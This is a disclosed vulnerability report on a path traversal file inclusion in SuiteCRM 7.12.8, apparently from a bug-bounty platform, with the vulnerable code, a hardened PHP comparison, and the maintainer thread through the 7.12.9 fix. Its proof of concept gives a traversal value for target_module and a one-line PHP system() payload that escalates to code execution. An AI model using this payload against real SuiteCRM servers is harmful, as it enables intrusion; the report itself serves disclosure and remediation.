Limited LFI via Path Traversal in salesagility/suitecrm

Valid

Reported on

Nov 29th 2022


Description

A path traversal vulnerability in SuiteCRM 7.12.8 and earlier allows remote authenticated attackers to include a PHP file from an arbitrary path via the unsanitized target_module request parameter.

Details

In SuiteCRM v7.12.8, SubpanelCreates.php and SubpanelEdits.php pass unsanitized user input into a file path that is then loaded with require. A low-privileged authenticated user is sufficient to trigger the vulnerability.

// SubpanelCreates.php L44
// User controls target_module
$mod_strings = return_module_language($current_language, $_REQUEST['target_module']);
[...]
// utils.php L1422 (return_module_language)
// $module is still the unsanitized user input
$loaded_mod_strings = LanguageManager::loadModuleLanguage($module, $language, $refresh);
[...]
// LanguageManager.php L268 (loadModuleLanguage)
// $module is still the unsanitized user input, so "../" segments escape the cache directory
$cachedfile = sugar_cached('modules/').$module.'/language/'.$lang.'.lang.php';
[...]
if (file_exists($cachedfile)) {
    global $mod_strings;

    require $cachedfile;
[...]

Proof of Concept

1 - Login to SuiteCRM (normal user with default permissions is enough - PoC requires the user to create a "Call")

2 - Navigate to "Calls" - "Create Call" - fill in a subject - "Save"

3 - Now select "Create Note or Attachment" from the "Notes" tab

4 - Intercept the outgoing request - it looks like this:

POST /index.php HTTP/1.1
Host: 10.0.5.4
Content-Length: 418
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.0.5.4
Referer: http://10.0.5.4/index.php?action=DetailView&module=Calls&record=61494278-5f7e-8c0c-8ebe-63860394c556&return_module=Calls&return_action=DetailView&offset=1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; _ga=GA1.1.942238813.1668699570; browserupdateorg=pause; xoops_user_6374ee42=1-004d76ce862be7d3476fa5bed68d529fcc57448ce07ed55dcc3b827801f37c407993b00bbb152419355fd8f86445e6d7da86a1782ef4fdfae3b13ad68c48dca8-ba58b54cd01bef7565aef75880049a8a6c96275c7a5aeb7300f0c8833ea4d4c4ed6ff2afdd46555b0819c3de5c74525754f982ec9b8eef59a2cbed14055afe7d; sid=1; shash=%242y%2410%241X9GGrpnbjXuiqGOwJrkZueXrHY6cCGUKtZ88Abw1euO62sfw6yRe; miniSidebar=1; sugar_user_theme=SuiteP; ck_login_language_20=en_us; Tasks_divs=Tasks_history_v%3Dtrue%23undefined%3D%23Tasks_securitygroups_v%3Dtrue%23; Contacts_divs=Contacts_bugs_v%3Dtrue%23undefined%3D%23; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; Accounts_divs=Accounts_activities_v%3Dtrue%23undefined%3D%23Accounts_history_v%3Dfalse%23Accounts_documents_v%3Dtrue%23Accounts_contacts_v%3Dtrue%23Accounts_securitygroups_v%3Dtrue%23; ck_login_theme_20=SuiteP; ck_login_id_20=58b402d3-aef6-2b59-a5c9-6385e39c3b6a; Users_divs=Users_aclroles_v%3Dtrue%23undefined%3D%23Users_securitygroups_v%3Dtrue%23; SecurityGroups_divs=SecurityGroups_users_v%3Dtrue%23undefined%3D%23SecurityGroups_aclroles_v%3Dtrue%23; Calls_divs=Calls_contacts_v%3Dtrue%23undefined%3D%23Calls_users_v%3Dtrue%23Calls_leads_v%3Dtrue%23Calls_history_v%3Dtrue%23; sidebartoggle=expanded; PHPSESSID=q0si3s73dopom9kqvnttdjbcmn
Connection: close

target_module=Notes&call_id=61494278-5f7e-8c0c-8ebe-63860394c556&call_name=a&to_pdf=true&tpl=QuickCreate.tpl&return_module=Calls&return_action=DetailView&return_id=61494278-5f7e-8c0c-8ebe-63860394c556&record=&action=SubpanelCreates&module=Home&target_action=QuickCreate&parent_type=Calls&parent_name=a&parent_id=61494278-5f7e-8c0c-8ebe-63860394c556&History_createnoteorattachment_button=Create%20Note%20or%20Attachment

The target_module parameter can now be changed to an arbitrary path: the server builds "<cache>/modules/<target_module>/language/<lang>.lang.php" and requires it if the file exists.

Combined with any primitive that places a file where the webserver can read it (an upload feature, an FTP or NFS share), this becomes RCE. For example, in a directory readable by the webserver:

# for example in /home/dummy/Documents (could also be an NFS or FTP share)
mkdir language
echo "<?php system('touch /var/www/html/i-was-here.txt'); ?>" > language/en_us.lang.php

Replace target_module with ../../../../../home/dummy/Documents (enough ../ segments to reach / from the cache directory) and forward the request. The file i-was-here.txt is now in the web root.

Mitigation

Reject module names that contain path separators (/ and \) or ".." rather than merely stripping those characters, or better, validate target_module against the list of known modules before building the path.
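As an added example (not code from this report or from SuiteCRM), the PHP below models the sink shown in the Details section and contrasts the unchecked concatenation with a hardened resolver of the kind the mitigation describes. The cache directory, the attacker-writable directory under home/dummy/Documents and both en_us.lang.php files are constructed in a temporary directory for the demonstration; the identifier allowlist and the realpath containment check are this example's own choices and are stricter than the separator check applied in 7.12.9.

```php
<?php
// Added example, not SuiteCRM code. Models the sink from LanguageManager.php:
//   sugar_cached('modules/') . $module . '/language/' . $lang . '.lang.php'
// first as the unchecked concatenation, then hardened.

// Constructed layout standing in for the SuiteCRM cache directory and for an
// attacker-writable directory outside it (assumed paths, created under /tmp).
$root     = sys_get_temp_dir() . '/lfi-demo-' . bin2hex(random_bytes(4));
$cacheDir = "$root/cache";                      // stand-in for sugar_cached('')
$outside  = "$root/home/dummy/Documents";       // where the attacker can write
mkdir("$cacheDir/modules/Notes/language", 0700, true);
mkdir("$outside/language", 0700, true);
file_put_contents("$cacheDir/modules/Notes/language/en_us.lang.php",
    '<?php $mod_strings = ["LBL_DEMO" => "legitimate cached strings"];');
file_put_contents("$outside/language/en_us.lang.php",
    '<?php $mod_strings = ["LBL_DEMO" => "attacker-controlled file was included"];');

// Vulnerable: the module name is whatever the request carried, so "../"
// segments walk out of cache/modules before "/language/<lang>.lang.php" is appended.
function vulnerable_lang_file(string $cacheDir, string $module, string $lang): string
{
    return "$cacheDir/modules/$module/language/$lang.lang.php";
}

// Hardened: allowlist both identifiers (this subsumes the "no / or \" check the
// 7.12.9 fix applies and also rejects "..", NUL bytes and encoded separators),
// then confirm the resolved path is still under cache/modules so that a symlink
// or an unexpected normalisation cannot escape either.
function hardened_lang_file(string $cacheDir, string $module, string $lang): ?string
{
    if (!preg_match('/^[A-Za-z0-9_]+$/', $module) || !preg_match('/^[a-z]{2}_[a-z]{2}$/', $lang)) {
        return null;
    }
    $base = realpath("$cacheDir/modules");
    $real = realpath("$cacheDir/modules/$module/language/$lang.lang.php");
    if ($base === false || $real === false || strncmp($real, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// The same sink as the original: require the file if it exists and pick up $mod_strings.
function load_strings(?string $file): array
{
    $mod_strings = [];
    if ($file !== null && file_exists($file)) {
        require $file;
    }
    return $mod_strings;
}

$payloads = [
    'Notes',                              // the legitimate value from the PoC request
    '../../home/dummy/Documents',         // traversal relative to $cacheDir/modules
    '..\\..\\home\\dummy\\Documents',     // same with backslashes (matters on Windows hosts)
];
foreach ($payloads as $module) {
    $v = load_strings(vulnerable_lang_file($cacheDir, $module, 'en_us'));
    $h = load_strings(hardened_lang_file($cacheDir, $module, 'en_us'));
    printf("%-32s vulnerable: %-40s hardened: %s\n", $module,
        $v['LBL_DEMO'] ?? '(no file)', $h['LBL_DEMO'] ?? '(rejected)');
}

// Remove the constructed files and directories again.
foreach (["$cacheDir/modules/Notes/language/en_us.lang.php", "$outside/language/en_us.lang.php"] as $f) {
    unlink($f);
}
foreach (["$cacheDir/modules/Notes/language", "$cacheDir/modules/Notes", "$cacheDir/modules", $cacheDir,
          "$outside/language", $outside, "$root/home/dummy", "$root/home", $root] as $d) {
    rmdir($d);
}
```

Run with `php` on a Linux host: the traversal payload makes the vulnerable resolver include the attacker's file while the hardened one rejects it. The backslash variant fails on Linux because \ is a literal filename character there, which is exactly why a fix has to reject \ as well as /: on a Windows host it is a directory separator and the traversal works.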

Notes

Testing was done with SubpanelCreates.php. SubpanelEdits.php contains the same vulnerable lines; however, I was not able to identify a valid entry point for that file during testing. I expect it to be exploitable in the same fashion.

Impact

Using CVSS v3.1 the following vector was determined: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N.

The impact depends entirely on the server environment and context. On its own, the primitive only includes a file whose path must end in "<path-traversal>/language/<lang>.lang.php", which is why confidentiality is rated Low and integrity and availability None. If any way to place a file on the server exists (an upload feature, a writable share), remote authenticated attackers can escalate this to remote code execution.

We are processing your report and will contact the salesagility/suitecrm team within 24 hours. 4 months ago
crackcat modified the report 4 months ago
We have contacted a member of the salesagility/suitecrm team and are waiting to hear back 4 months ago
salesagility/suitecrm maintainer
4 months ago

Maintainer


Hi crackcat

Thank you for your Security Report.

We have raised the issue from this report with our internal security team to be confirmed.

Below is a reference of the issue raised and ID allocated:

SCRMBT-#219 - Limited LFI via Path Traversal

We will review the issue and confirm it is a vulnerability within SuiteCRM and meets our criteria for a Security issue. If an issue is not considered a Security issue or that it does not need to be private then we'll raise it via the GitHub bug tracker or in a more appropriate place.

Thank you for your contribution to the SuiteCRM project.

Kind Regards

SuiteCRM Security Team

salesagility/suitecrm maintainer has acknowledged this report 4 months ago
crackcat submitted a
3 months ago
Clemente Raposo validated this vulnerability 3 months ago

Hi @crackcat,

The Security Team have now assessed the following issue:

  • SCRMBT-#219 - Limited LFI via Path Traversal

This issue has been given a severity grading of 'Important'. Due to the severity of this issue we are working to release a fix for it very soon.

Once the fix is released, we aim to include your name in the release notes - giving credit for finding and reporting this issue. Please let us know if you would prefer not be included or have a specific request on how you would like to be referenced within the release notes.

Thank you for your assistance and contribution to the SuiteCRM product!

Kind regards, SuiteCRM Security Team

crackcat has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
crackcat
3 months ago

Researcher


Thank you for your fast response! 👍

For the reference, a link to my github profile (@crackcat) would be great.

crackcat
3 months ago

Researcher


Hi @maintainer,

Does a release by the end of january seem realistic?

salesagility/suitecrm maintainer
2 months ago

Maintainer


Hi crackcat,

Our security team has come up with a fix for this issue which is currently being tested. We are unable to give specific timescales, but once it has been fully tested it will go into the next maintenance release.

crackcat
2 months ago

Researcher


I can confirm that this vulnerability has now been patched with the latest release 7.12.9 in commit c19f22 by preventing the module from containing any \ and / in utils.php. Thank you @maintainer 👍

Matt Lorimer marked this as fixed in 7.12.9 with commit c19f22 2 months ago
Matt Lorimer has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 25th 2023
Matt Lorimer gave praise 2 months ago
Thank you @crackcat 👍
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Matt Lorimer published this vulnerability a month ago